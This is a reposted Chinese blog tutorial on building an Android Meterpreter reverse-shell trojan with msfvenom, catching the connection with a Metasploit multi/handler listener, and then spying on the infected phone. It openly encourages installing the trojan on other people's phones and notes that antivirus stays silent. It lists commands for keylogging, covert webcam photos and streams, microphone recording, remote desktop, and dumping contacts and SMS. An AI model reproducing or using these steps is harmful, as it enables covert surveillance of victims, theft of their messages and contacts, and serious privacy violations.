行動開始
先查看kali的ip,我的是1.114
然后輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
5555是設定的埠,可以自己更改 顯示這個說明已經生成成功了
然后啟動msf:msfconsole 然后輸入命令:
1.use exploit/multi/handler //加載模塊
2. set payload android/meterpreter/reverse_tcp //選擇Payload
3.show options //查看引數設定
這個payload里邊有兩個引數要設定 LHOST和LPORT 表示地址和埠 默認的埠是4444 現在我們來更改設定
1.set LHOST 192.168.1.114 //這里的地址設定成我們剛才生成木馬的IP地址
2.set LPORT 5555 //這里的埠設定成剛才我們生成木馬所監聽的埠
3.exploit //開始執行漏洞 開始監聽,等待手機上線
靠自己發揮把木馬安裝到別人手機上,我這里測驗就用自己的手機安裝上了
安裝程序360全程無提示~
紅色框出的地方就說明手機上線了 然后可以輸入sysinfo 查看手機資訊
webcam_list 查看手機有多少個攝像頭 這里顯示是2個
keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄
record_mic:錄制聲音(如果目標主機上有話筒的話)
webcam_chat:查看攝像頭介面
webcam_stream //開啟攝像頭
webcam_list:查看攝像頭串列
webcam_snap //隱秘拍照功能
webcam_snap 隱秘拍照功能 -i 1 或者2是開啟前置攝像頭和后置攝像頭的
run vnc:開啟遠程桌面
dump_contacts //匯出電話號碼
dump_sms //匯出資訊
可以輸入?查看更多命令
轉載:https://mp.weixin.qq.com/s/C_K5lN2J1VQ3WPQuG99Bng
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/43357.html
標籤:其他
上一篇:python 分類合并的問題
